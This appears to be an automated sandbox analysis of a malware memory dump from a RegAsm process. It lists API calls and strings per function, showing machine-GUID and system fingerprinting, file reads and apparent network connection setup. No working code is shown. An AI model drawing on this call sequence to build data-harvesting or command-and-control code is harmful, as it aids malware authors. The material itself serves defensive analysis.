Source File: 00000002.00000002.2055543025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2055543025.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressProc$EventProcesslstrcpy$CloseCreateExitHandleHeapOpenstrcmp$AllocCapsDeviceLibraryLoadNameReleaseSleepUserlstrcatlstrlen
String ID:
API String ID: 3108587868-0
Opcode ID: 1d8b1de72db4383d4400f6d01818f042c6ed5c7fe0d4ca9eea97ec86f2159df5
Instruction ID: 647acd411ead89d836921b015eed4027088bc395b0a35a31edabbaa9f7aa6c77
Opcode Fuzzy Hash: 1d8b1de72db4383d4400f6d01818f042c6ed5c7fe0d4ca9eea97ec86f2159df5
Instruction Fuzzy Hash: BA217F309001096AD700F7F1DC56FEE7369AF05709F50012EF606B60D2DF7C2989866D

Uniqueness

Uniqueness Score: -1.00%

Function 00410C90 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 42registryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00410CB5
RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,00000000), ref: 00410CD2
RegQueryValueExA.KERNEL32(00000000,MachineGuid,00000000,00000000,00000000,000000FF), ref: 00410CF4
CharToOemA.USER32(00000000,?), ref: 00410D12

Strings

MachineGuid, xrefs: 00410CEE
SOFTWARE\Microsoft\Cryptography, xrefs: 00410CC8

Memory Dump Source

Source File: 00000002.00000002.2055543025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2055543025.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CharOpenQueryValuememset
String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
API String ID: 1728412123-1211650757
Opcode ID: c5de048e1d1cde4379b446a0d5fa29705f724f43fda2a5672e90642c938baa44
Instruction ID: 734486b7100e6d63ed2b29b9d7cba1e03fbf9e6038e99d6900f302105bc7df50
Opcode Fuzzy Hash: c5de048e1d1cde4379b446a0d5fa29705f724f43fda2a5672e90642c938baa44
Instruction Fuzzy Hash: 8601B579640219ABD724DB90DC4AFE97778AB14704F104199B645621C0DAB46A858B50

Uniqueness

Uniqueness Score: -1.00%

Function 004106E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,TimeZone: ,00000000,?,004284AC,00000000,?,00000000,00000000,?,Local Time: ,00000000,?,00428498), ref: 004106EE
HeapAlloc.KERNEL32(00000000,?,TimeZone: ,00000000,?,004284AC,00000000,?,00000000,00000000,?,Local Time: ,00000000,?,00428498,00000000), ref: 004106F5
GlobalMemoryStatusEx.KERNEL32(?,?,00000000,00000040), ref: 00410715
wsprintfA.USER32 ref: 0041073B

Strings

%d MB, xrefs: 00410735
@, xrefs: 0041070E

Memory Dump Source

Source File: 00000002.00000002.2055543025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2055543025.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocGlobalMemoryProcessStatuswsprintf
String ID: %d MB$@
API String ID: 3644086013-3474575989
Opcode ID: 5c15e8f739123b19d1baced4fe448482e4d8f3540cc7547e32c0a38f8f91194a
Instruction ID: 3858def785d9e4baa448147c13a215b95796b3cfcd3afa1d1fab1a2876bbce8c
Opcode Fuzzy Hash: 5c15e8f739123b19d1baced4fe448482e4d8f3540cc7547e32c0a38f8f91194a
Instruction Fuzzy Hash: A3F09675A40118ABE7149BA4EC1AFFE77ADEB01701F500119F706D72C0DBB89C4587A9

Uniqueness

Uniqueness Score: -1.00%

Function 00406E40 Relevance: 9.1, APIs: 6, Instructions: 80filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000002,?,0040CABD,?,00000000,?,00000000,00000000), ref: 00406E77
GetFileSizeEx.KERNEL32(00000000,?,?,0040CABD,?,00000000,?,00000000,00000000,?), ref: 00406E8D
LocalAlloc.KERNEL32(00000040,?,?,?,0040CABD,?,00000000,?,00000000,00000000,?), ref: 00406EA8
ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,0040CABD,?,00000000,?,00000000,00000000,?), ref: 00406EC1
LocalFree.KERNEL32(?,?,?,0040CABD,?,00000000,?,00000000,00000000,?), ref: 00406EE1
CloseHandle.KERNEL32(00000000,?,0040CABD,?,00000000,?,00000000,00000000,?), ref: 00406EE9

Memory Dump Source

Source File: 00000002.00000002.2055543025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2055543025.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$Local$AllocCloseCreateFreeHandleReadSize
String ID:
API String ID: 2311089104-0
Opcode ID: 579c2fe795106ecf5eccca885b31128ca63010d2d47496a338ba6b2560c36b0f
Instruction ID: fca360b4b4926ce2ce86bd9a704f617748b4363ecef1e2cd769cd9a162bdc231
Opcode Fuzzy Hash: 579c2fe795106ecf5eccca885b31128ca63010d2d47496a338ba6b2560c36b0f
Instruction Fuzzy Hash: 0F214CB560020AAFDB10DFA4DC84FAF77A9EB49714F10022AF912A72C0D7389D51CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00407240 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 181libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,01522DE0,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

GetEnvironmentVariableA.KERNEL32(0152F7D8,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,00000000,00000000,01531CC8,?,00427A64,?,?,01531F20,01531F20,00427A5F,?), ref: 00407311

Part of subcall function 0040FF10: lstrlen.KERNEL32(00418949,?,00000000,?,00417FAF,004283A3,004283A2,00000000,?,00000000,00423261,000000FF,?,00418949), ref: 0040FF1B
Part of subcall function 0040FF10: lstrcpy.KERNEL32(00000000,00418949), ref: 0040FF52

SetEnvironmentVariableA.KERNEL32(0152F7D8,00000000,00000000,hzB,?,?,00427A68,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,00427A63), ref: 0040738E
LoadLibraryA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,00420658,000000FF,?,0040BE2B), ref: 004073A9

Strings

hzB, xrefs: 00407349, 00407366, 0040734D
C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 0040730B, 00407324

Memory Dump Source

Source File: 00000002.00000002.2055543025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2055543025.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;$hzB
API String ID: 2929475105-2770337157
Opcode ID: 31dd4db35a1bb3b1cce8a79840ee6e2a0866e1f6c2fd180dfcfd9305cc2df682
Instruction ID: 579015a8dc8e7fb9ba4dc0b4b2d1472570f0f46b00a7972d46a8666dc34995d3
Opcode Fuzzy Hash: 31dd4db35a1bb3b1cce8a79840ee6e2a0866e1f6c2fd180dfcfd9305cc2df682
Instruction Fuzzy Hash: DC71E570900249DEDB04EBE4D846BEEBBB9AF1A304F14417EF905672D1DF781A48C7A5

Uniqueness

Uniqueness Score: -1.00%

Function 00415650 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 113sleepsynchronizationthreadCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000003E8,00422AB9,fA,?,?,?,00000001), ref: 00415716
CreateThread.KERNEL32(00000000,00000000,004140D0,?,00000000,00000000), ref: 00415737
WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00415743

Strings

fA, xrefs: 004157CA
fA, xrefs: 004156F1, 004157B3, 004156F4

Memory Dump Source

Source File: 00000002.00000002.2055543025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2055543025.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CreateObjectSingleSleepThreadWait
String ID: fA$fA
API String ID: 4198075804-1630953348
Opcode ID: 4c7f4e472d745ab8cab7eb6f144f57fb864aedb4309a7d0810c75c658f687d6f
Instruction ID: 4a7e4500b8fefa130c25cbd9421f046c1ba1e46fcba1c1cc5636780b9c3006f8
Opcode Fuzzy Hash: 4c7f4e472d745ab8cab7eb6f144f57fb864aedb4309a7d0810c75c658f687d6f
Instruction Fuzzy Hash: 40412D74801249EADB11EFA5C981BDDBBB4AB19304F50407EE906676C2DF781A4CCBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00410F40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 47memoryregistryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410F55
HeapAlloc.KERNEL32(00000000), ref: 00410F5C

Part of subcall function 00410200: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00410215
Part of subcall function 00410200: HeapAlloc.KERNEL32(00000000), ref: 0041021C
Part of subcall function 00410200: RegOpenKeyExA.KERNEL32(80000002,0152B528,00000000,00020119,?), ref: 0041023B
Part of subcall function 00410200: RegQueryValueExA.KERNEL32(?,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00410255

RegOpenKeyExA.KERNEL32(80000002,0152B528,00000000,00020119,00000000), ref: 00410F91
RegQueryValueExA.KERNEL32(00000000,01531D40,00000000,00000000,00000000,000000FF), ref: 00410FAC

Strings

Windows 11, xrefs: 00410F70

Memory Dump Source

Source File: 00000002.00000002.2055543025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2055543025.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocOpenProcessQueryValue
String ID: Windows 11
API String ID: 3676486918-2517555085
Opcode ID: d43087b26c80f33632802deaa44fe005c08705709e3937b8f2a439f42bc598b2
Instruction ID: 53ce30e9246303524b4cf8f670f0acc819984a5071f51573bc99cb0a8d9a2c5a
Opcode Fuzzy Hash: d43087b26c80f33632802deaa44fe005c08705709e3937b8f2a439f42bc598b2
Instruction Fuzzy Hash: C701267860020AFBD714DBA0EC4EEABB7BDEB45B01F104159FA04D7250D6B45D80C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 00410200 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40memoryregistryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00410215
HeapAlloc.KERNEL32(00000000), ref: 0041021C
RegOpenKeyExA.KERNEL32(80000002,0152B528,00000000,00020119,?), ref: 0041023B
RegQueryValueExA.KERNEL32(?,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00410255

Strings

CurrentBuildNumber, xrefs: 0041024F

Memory Dump Source

Source File: 00000002.00000002.2055543025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2055543025.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocOpenProcessQueryValue
String ID: CurrentBuildNumber
API String ID: 3676486918-1022791448
Opcode ID: 6f3398eec55eb66702cb792dadfb379ee1dfd6b4411625055140db05f208c69e
Instruction ID: 4c14057a90075943bc9431615e63d58b06497ca245fa930b3837fb80e640c4dc
Opcode Fuzzy Hash: 6f3398eec55eb66702cb792dadfb379ee1dfd6b4411625055140db05f208c69e
Instruction Fuzzy Hash: 4AF0AFB9540205BBE7109BA0EC4EFABBBADEF49B01F500155FA0596280E6B45A44C7B4

Uniqueness

Uniqueness Score: -1.00%

Function 00417F00 Relevance: 7.7, APIs: 3, Strings: 1, Instructions: 660networksleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 0040FF10: lstrlen.KERNEL32(00418949,?,00000000,?,00417FAF,004283A3,004283A2,00000000,?,00000000,00423261,000000FF,?,00418949), ref: 0040FF1B
Part of subcall function 0040FF10: lstrcpy.KERNEL32(00000000,00418949), ref: 0040FF52

Part of subcall function 00418CB0: GetProcAddress.KERNEL32(74DD0000,015228E0), ref: 00418CC5
Part of subcall function 00418CB0: GetProcAddress.KERNEL32(74DD0000,01522780), ref: 00418CDD
Part of subcall function 00418CB0: GetProcAddress.KERNEL32(74DD0000,0152DB70), ref: 00418CF6
Part of subcall function 00418CB0: GetProcAddress.KERNEL32(74DD0000,0152D9D8), ref: 00418D0E
Part of subcall function 00418CB0: GetProcAddress.KERNEL32(74DD0000,0152D948), ref: 00418D26
Part of subcall function 00418CB0: GetProcAddress.KERNEL32(74DD0000,0152DAE0), ref: 00418D3F
Part of subcall function 00418CB0: GetProcAddress.KERNEL32(74DD0000,01524048), ref: 00418D57
Part of subcall function 00418CB0: GetProcAddress.KERNEL32(74DD0000,0152DA50), ref: 00418D6F
Part of subcall function 00418CB0: GetProcAddress.KERNEL32(74DD0000,0152D8D0), ref: 00418D88
Part of subcall function 00418CB0: GetProcAddress.KERNEL32(74DD0000,0152D888), ref: 00418DA0
Part of subcall function 00418CB0: GetProcAddress.KERNEL32(74DD0000,0152D960), ref: 00418DB8
Part of subcall function 00418CB0: GetProcAddress.KERNEL32(74DD0000,01522900), ref: 00418DD1
Part of subcall function 00418CB0: GetProcAddress.KERNEL32(74DD0000,015226C0), ref: 00418DE9
Part of subcall function 00418CB0: GetProcAddress.KERNEL32(74DD0000,015227A0), ref: 00418E01
Part of subcall function 00418CB0: GetProcAddress.KERNEL32(74DD0000,01522C20), ref: 00418E1A
Part of subcall function 00418CB0: GetProcAddress.KERNEL32(74DD0000,0152D9F0), ref: 00418E32

Part of subcall function 004114D0: GetSystemTime.KERNEL32(?,0152EAD8,00428288,?,00000000,00000000,004283A2,00000000,?,00000000,00423261,000000FF,?,00418949), ref: 00411525

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,01522DE0,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004181D6
InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004181F0

Part of subcall function 00410D90: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00410DC8
Part of subcall function 00410D90: GetVolumeInformationA.KERNEL32(00421EB9,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00410E01
Part of subcall function 00410D90: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410E4D
Part of subcall function 00410D90: HeapAlloc.KERNEL32(00000000), ref: 00410E54

Part of subcall function 00404490: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040455A
Part of subcall function 00404490: StrCmpCA.SHLWAPI(?,0152F518,?,?,?,?,?,?,00000000), ref: 0040457A

Part of subcall function 00412870: StrCmpCA.SHLWAPI(00000000,block,00000000,?,0041826A), ref: 004128A8
Part of subcall function 00412870: ExitProcess.KERNEL32 ref: 004128B3

Part of subcall function 00405C90: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405D5A
Part of subcall function 00405C90: StrCmpCA.SHLWAPI(?,0152F518,?,?,?,?,?,?,00000000), ref: 00405D7A

Part of subcall function 004122F0: strtok_s.MSVCRT ref: 00412330

Sleep.KERNEL32(000003E8), ref: 004185E9

Part of subcall function 00405C90: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405F04

Part of subcall function 00413930: strtok_s.MSVCRT ref: 0041396C
Part of subcall function 00413930: strtok_s.MSVCRT ref: 004139AE

Part of subcall function 00411DF0: memset.MSVCRT ref: 00411E2B

Part of subcall function 00405C90: HttpOpenRequestA.WININET(00000000,0152F488,?,01532148,00000000,00000000,-00400100,00000000), ref: 00405F44
Part of subcall function 00405C90: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405F6B

Strings

%, xrefs: 0041881A

Memory Dump Source

Source File: 00000002.00000002.2055543025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2055543025.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressProc$Internetlstrcpy$Open$strtok_s$HeapProcesslstrcatlstrlen$AllocConnectDirectoryExitHttpInformationOptionRequestSleepSystemTimeVolumeWindowsmemset
String ID: %
API String ID: 3292282700-2567322570
Opcode ID: e1c95a4c01a5b8944ecfee2bb706b87a2ab9dee71af13ea143bb6d54da976b17
Instruction ID: a80d5cc082a79b13c4afddcc74089088984bc40af4cfd8f7e2f84988951bca03
Opcode Fuzzy Hash: e1c95a4c01a5b8944ecfee2bb706b87a2ab9dee71af13ea143bb6d54da976b17
Instruction Fuzzy Hash: E9428F70D10358EADF10EBA5C946BDDBBB4AF19308F5041AEF54573282DB781B48CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 004171B0 Relevance: 7.6, APIs: 5, Instructions: 148registrystringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004171F1
RegOpenKeyExA.KERNEL32(80000001,01531920,00000000,00020119,00422FC0), ref: 00417210
RegQueryValueExA.ADVAPI32(00422FC0,01532118,00000000,00000000,?,000000FF), ref: 00417234
lstrcat.KERNEL32(?,?), ref: 00417263
lstrcat.KERNEL32(?,015321F0), ref: 00417277

Memory Dump Source

Source File: 00000002.00000002.2055543025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2055543025.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$OpenQueryValuememset
String ID:
API String ID: 558315959-0
Opcode ID: 7114117b7e44a6b0a2ec1ac4c4aa7947016af69031e2551ac02debfbb669832e
Instruction ID: 74d8b735119c2182752737772a63e4f349c5be27bf2cba7256ea7a55185fa83a
Opcode Fuzzy Hash: 7114117b7e44a6b0a2ec1ac4c4aa7947016af69031e2551ac02debfbb669832e
Instruction Fuzzy Hash: 8F51E370940208ABCB18EFA0CC46FEE7779AB49704F10855EF61967281DB746A89CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 00410FF0 Relevance: 7.6, APIs: 5, Instructions: 70commemoryCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00428AE4,00000000,00000001,00428278,?,00000001,00000001,?,00000000,?,Windows: ,00000000,?,0042840C,00000000,?), ref: 0041100D
SysAllocString.OLEAUT32(?), ref: 0041101C
_wtoi64.MSVCRT ref: 00411062
SysFreeString.OLEAUT32(?), ref: 00411078
SysFreeString.OLEAUT32(00000000), ref: 0041107B

Memory Dump Source

Source File: 00000002.00000002.2055543025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2055543025.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: String$Free$AllocCreateInstance_wtoi64
String ID:
API String ID: 1817501562-0
Opcode ID: 757001a73b8a560c4d2357d90eba04831e664b269fe4ba776794b7a64135a60a
Instruction ID: 0243a214321a8e11e6d6ada038f83521d736f052b3ccf67aedd98e01bceb802f
Opcode Fuzzy Hash: 757001a73b8a560c4d2357d90eba04831e664b269fe4ba776794b7a64135a60a
Instruction Fuzzy Hash: 72117275B00118AFC710DFA9CC84DAA7BB9EFC9344B1481AAE605C7320DA35EE81CB60

Uniqueness

Uniqueness Score: -1.00%

Function 19C2FD40 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 134fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?,?), ref: 19C2FE03

Strings

winRead, xrefs: 19C2FE3D
